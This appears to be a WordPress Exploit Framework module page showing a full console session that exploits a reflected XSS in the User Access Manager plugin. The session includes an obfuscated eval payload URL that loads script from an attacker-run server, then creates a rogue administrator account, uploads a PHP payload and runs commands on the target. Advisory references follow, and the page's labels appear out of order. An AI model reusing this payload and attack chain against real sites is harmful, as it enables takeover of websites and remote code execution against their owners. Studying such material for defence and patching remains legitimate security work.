wpxf > use exploit/user_access_manager_reflected_xss_shell_upload
[+] Loaded module: #<Wpxf::Exploit::UserAccessManagerReflectedXssShellUpload:0x00000001b19008>
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set host 192.168.0.47
[+] Set host => 192.168.0.47
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set http_server_bind_port 8080
[+] Set http_server_bind_port => 8080
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set xss_host 192.168.0.220
[+] Set xss_host => 192.168.0.220
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x00000001af1058>
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set cmd whoami
[+] Set cmd => whoami
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > check
[!] Target appears to be vulnerable
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > run
[-] Provide the URL below to the victim to begin the payload upload
http://192.168.0.47/wp-admin/admin.php?page=uam_usergroup&action=editGroup&id=%5C%22%3E%3Cscript%3Eeval%28String.fromCharCode%28101%2C118%2C97%2C108%2C40%2C100%2C101%2C99%2C111%2C100%2C101%2C85%2C82%2C73%2C67%2C111%2C109%2C112%2C111%2C110%2C101%2C110%2C116%2C40%2C47%2C118%2C97%2C114%2C37%2C50%2C48%2C97%2C37%2C50%2C48%2C37%2C51%2C68%2C37%2C50%2C48%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C99%2C114%2C105%2C112%2C116%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C97%2C46%2C115%2C101%2C116%2C65%2C116%2C116%2C114%2C105%2C98%2C117%2C116%2C101%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C114%2C99%2C37%2C50%2C50%2C37%2C50%2C67%2C37%2C50%2C48%2C37%2C50%2C50%2C104%2C116%2C116%2C112%2C37%2C51%2C65%2C37%2C50%2C70%2C37%2C50%2C70%2C49%2C57%2C50%2C46%2C49%2C54%2C56%2C46%2C48%2C46%2C50%2C50%2C48%2C37%2C51%2C65%2C56%2C48%2C56%2C48%2C37%2C50%2C70%2C109%2C86%2C65%2C69%2C116%2C121%2C103%2C114%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C104%2C101%2C97%2C100%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C37%2C50%2C56%2C97%2C37%2C50%2C57%2C37%2C51%2C66%2C47%2C46%2C115%2C111%2C117%2C114%2C99%2C101%2C41%2C41%29%29%3C%2Fscript%3E
[-] Started HTTP server on 0.0.0.0:8080
[-] Incoming request received, serving JavaScript...
[+] Created a new administrator user, sDoLTH:JbEcHpWrex
[-] HTTP server stopped
[-] Authenticating with WordPress using sDoLTH:JbEcHpWrex...
[-] Uploading payload...
[-] Executing the payload at
http://192.168.0.47/wp-content/plugins/IdfccoQgun/WCWyiebhMp.php...
[+] Result: www-data
[+] Execution finished successfully
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] >
This module exploits the "user-access-manager" module WordPress Plugin
Fixed in: 2.0.0
References:
http://www.defensecode.com/advisories/DC-2017-01-021_WordPress_User_Access_Manager_Plugin_Advisory.pdf
http://seclists.org/bugtraq/2017/May/31
WPVDBID:8814
Disclosure: 2017-05-11
Example output: